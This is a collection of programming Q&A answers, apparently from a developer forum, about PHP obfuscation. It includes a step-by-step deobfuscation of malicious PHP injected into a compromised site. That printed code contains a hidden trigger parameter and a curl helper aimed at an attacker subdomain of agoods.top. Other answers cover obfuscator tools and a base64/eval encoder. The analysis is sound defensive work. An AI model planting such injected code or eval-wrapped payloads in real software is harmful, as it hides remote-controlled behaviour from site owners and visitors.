Obfuscate PHP Code

Is PHP obfuscation necessary at all?

It's designed to obfuscate distributed PHP code. For example, say you're selling a forum system but offer a free trial. If someone can just go in and disable the payment check, then what's the point of selling it?

How to deobfuscate a PHP code that is written as below?

You can unravel this step by step.

There is this $OOOOOO string which then URL-decoded into $O, which yields the following (which looks like going through the keyboard row by row):

$O = "qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM_-\"?> <.-=:/1230654879';()&^$[]\\%{}!*|+,";

From then on, in many places characters of this string are accessed (using the lesser-known and by now also deprecated braces syntax for array index access) and used to build new strings. We can replace all these $O{x} bits with the actual characters (I used a regex replace):


if($_GET["c"."h"."e"."n"]=="5"."1"."-"."c"."n"){
    $oooOoOoOoooOooOOooooo = file_get_contents(__FILE__);
    $oooOoOoOoOoooooOOooo = explode("<"."?"."p"."h"."p",$oooOoOoOoooOooOOooooo);
    if(strpos($oooOoOoOoOoooooOOooo[1],'%71%77%65')!==false){ 
        echo "["."o"."k"."!"."]";
        exit;
    }else{
        echo "["."f"."a"."i"."l"."!"."]";
        exit;
    }
}

$oOooOO='z0807_1';
$oOooOOoO="h"."t"."t"."p".":"."/"."/".$oOooOO."."."a"."g"."o"."o"."d"."s"."."."t"."o"."p"; 
function ooooooooOOOOOOOOoooooOOO($oooOOOoOoo){
    $ooooOOOooOo=curl_init();
    curl_setopt ($ooooOOOooOo, CURLOPT_URL, $oooOOOoOoo);curl_setopt ($ooooOOOooOo, CURLOPT_RETURNTRANSFER, 1);curl_setopt ($ooooOOOooOo, CURLOPT_CONNECTTIMEOUT, 5);$oooooOOOOooO = curl_exec($ooooOOOooOo);
    curl_close($ooooOOOooOo);
    return $oooooOOOOooO; 
}

We can then combine those strings to make them more readable:


if($_GET["chen"]=="51-cn"){
    $oooOoOoOoooOooOOooooo = file_get_contents(__FILE__);
    $oooOoOoOoOoooooOOooo = explode("<?php",$oooOoOoOoooOooOOooooo);
    if(strpos($oooOoOoOoOoooooOOooo[1],'%71%77%65')!==false){ 
        echo "[ok!]";
        exit;
    }else{
        echo "[fail!]";
        exit;
    }
}

$oOooOO='z0807_1';
$oOooOOoO="http://".$oOooOO.".agoods.top"; 
function ooooooooOOOOOOOOoooooOOO($oooOOOoOoo){
    $ooooOOOooOo=curl_init();
    curl_setopt ($ooooOOOooOo, CURLOPT_URL, $oooOOOoOoo);curl_setopt ($ooooOOOooOo, CURLOPT_RETURNTRANSFER, 1);curl_setopt ($ooooOOOooOo, CURLOPT_CONNECTTIMEOUT, 5);$oooooOOOOooO = curl_exec($ooooOOOooOo);
    curl_close($ooooOOOooOo);
    return $oooooOOOOooO; 
}

Now let's rename the confusing variables:


if($_GET["chen"]=="51-cn"){
    $varA = file_get_contents(__FILE__);
    $varB = explode("<?php",$varA);
    if(strpos($varB[1],'%71%77%65')!==false){ 
        echo "[ok!]";
        exit;
    }else{
        echo "[fail!]";
        exit;
    }
}

$varC='z0807_1';
$varD="http://".$varC.".agoods.top"; 
function someFunction($varE){
    $varF=curl_init();
    curl_setopt ($varF, CURLOPT_URL, $varE);curl_setopt ($varF, CURLOPT_RETURNTRANSFER, 1);curl_setopt ($varF, CURLOPT_CONNECTTIMEOUT, 5);$varG = curl_exec($varF);
    curl_close($varF);
    return $varG; 
}

Next, let's split up the long line inside of the function:

if($_GET["chen"]=="51-cn"){
    $varA = file_get_contents(__FILE__);
    $varB = explode("<?php",$varA);
    if(strpos($varB[1],'%71%77%65')!==false){ 
        echo "[ok!]";
        exit;
    }else{
        echo "[fail!]";
        exit;
    }
}

$varC='z0807_1';
$varD="http://".$varC.".agoods.top"; 
function someFunction($varE){
    $varF=curl_init();
    curl_setopt ($varF, CURLOPT_URL, $varE);
    curl_setopt ($varF, CURLOPT_RETURNTRANSFER, 1);
    curl_setopt ($varF, CURLOPT_CONNECTTIMEOUT, 5);
    $varG = curl_exec($varF);
    curl_close($varF);
    return $varG; 
}

As a final step, we can guess better names for those variables:

if($_GET["chen"]=="51-cn"){
    $thisFileSource = file_get_contents(__FILE__);
    $parts = explode("<?php",$thisFileSource);
    if(strpos($parts[1],'%71%77%65')!==false){ 
        echo "[ok!]";
        exit;
    }else{
        echo "[fail!]";
        exit;
    }
}

$subdomain='z0807_1';
$url="http://".$subdomain.".agoods.top"; 
function sendRequest($url){
    $curl=curl_init();
    curl_setopt ($curl, CURLOPT_URL, $url);
    curl_setopt ($curl, CURLOPT_RETURNTRANSFER, 1);
    curl_setopt ($curl, CURLOPT_CONNECTTIMEOUT, 5);
    $result = curl_exec($curl);
    curl_close($curl);
    return $result; 
}

As for what this code does: If this is called with query parameter chen=51-cn in the URL, it checks if the current file contains the start of that $OOOOOO string in the first PHP code section, and if it does, it returns [ok!], otherwise [fail!]. (This sounds entirely useless to me, because if the code wouldn't exist, then it wouldn't run either, so just echo "[ok!]"; would have sufficed...) Additionally, it prepares a request to http://z0807_1.agoods.top but it's never executed, at least not in the piece of code that you showed. (Maybe it's executed elsewhere in your code at some other place where code got injected too! Could be worth looking for ooooooooOOOOOOOOoooooOOO.)

Googling for "agoods.top" reveals a lot of seemingly unrelated sites that include in their contents what appears to be various PHP errors like Warning: mysqli::__construct(): (HY000/1040): Too many connections in /www/wwwroot/z0930_1.agoods.top/connect2.php on line 7. (How ironic, given that in the injected code, error output is suppressed.) Browsing these sites (which I did with a lot of care, so you don't have to!) shows that some of them act maliciously, for example redirecting the user to a fake "browser update" page after a few seconds, and many are just down by now. This makes me believe that those are also hijacked sites, and that the code was supposed to eventually pull HTML from the attacker's sites on zXXXX_X.agoods.top and inject it into the page, but the attacker messed up and also delivered PHP errors that way which ended up in Google's cache.

Minify / Obfuscate PHP Code

I agree with the comment, what you are doing is very underhanded, but after 10 years in this biz I can attest to one thing: Half the code you get is so convoluted it might as well have been minified, and really function/var names are so often completely arbitrary, i've edited minified js and it wasn't much more of a hassle than some unminified code.

I couldn't find any such script/program, most likely because this is kind of against the PHP spirit and a bit underhanded, never the less.

First: Php isn't white space sensitive, so step one is to remove all newlines and whitespace outside of string.

That would make it difficult to mess with for the average tinkerer, an intermediate programmer would just find and replace all ;{} with $1\n or something to that effect.

The next step would be to get_defined_functions and save that array (The 'user' key in the returned array), you'll need to include all of the files to do this.

If it's oo code, you'll need get_defined_classes as well. Save that array.

Essentially, you need to get the variables, methods, and class instances, you'll have to instantiate the class and get_object_vars on it, and you can poke around and see that you can get alot of other info, like Constants and class vars etc.

Then you take those lists, loop through them, create a unique name for each thing, and then preg_replace, or str_replace that in all of the files.

Make sure you do this on a test copy, and see what errors you get.

Though, just to be clear, there is a special place in hell reserved for people who obfuscate for obfuscation's sake.

Check out: get_defined_functions get_declared_classes and just follow the links around to see what you can do.

Obfuscate PHP code

I put together the following list a ways back - don't know if they are all current, or how many are now free, but you should find something useful here:

About:

Wikipedia article: PHP Accelerator
Comparison of APC, Zend, xCache, & the Zend Framework

Software:

Safeyar (Best)
PHP's APC (PECL page)
RoadSend
Turck-mmcache
eAccelerator
PHP-Accelerator
SourceGuardian
NuSphere Nu-coder
Gridinsoft
IonCube SA-Encoder.php

Another thread on SO that adds a few more (check it out):

Can I encrypt PHP source or compile it so others can't see it? and how?

Zend Guard
BCompiler (PECL page)
PHC

PHP Code obfuscation

There's a bunch of PHP obfuscators. Probably several of them can do something like this.

Our Thicket PHP Obfuscator will obfuscate literal strings exactly this way, and will preserve system function identifiers such as "session_start" in this fashion, so it could be ours.

Ioncube - PHP code obfuscation without encoding

It seems that it is not possible and it has never been possible to obfuscate only: http://forum.ioncube.com/viewtopic.php?p=10797#10797

Obfuscate PHP code (prevent source code viewing)

You can use Zend Guard to do the same so that it will encrypt your whole code and will compile it so that no one can use your source code. it works same as we do in JAVA as it create byte code in class files.

Go through this link Zend Guard

Zend Guard, the most widely accepted PHP encoding and obfuscation product on the market

it will do following tasks for you:

Prevent reverse engineering & unauthorized modifications
Protect your code from unauthorized use

Encode or Obfuscate PHP code

A very barebones version would be

<?php

$po = '<' . '?php';
$pc = '?' . '>';

$input = 'file.php';
$code = file_get_contents($input);

$encoded = base64_encode($code);

$encoded_script = <<<EOL
$po

eval(base64_decode($encoded));

$pc
EOL;

file_put_contents('encoded.php', $encoded_script);

The only thing the commercial obfuscators do is add extra levels of obfuscation - rename variables into non-meaningful garbage. Maybe vary the encoding methods, split the source script into multiple chunks and have each one encoded differently, etc...

But in the end, it all boils down to useless garbage that protects about as well as wet toilet paper.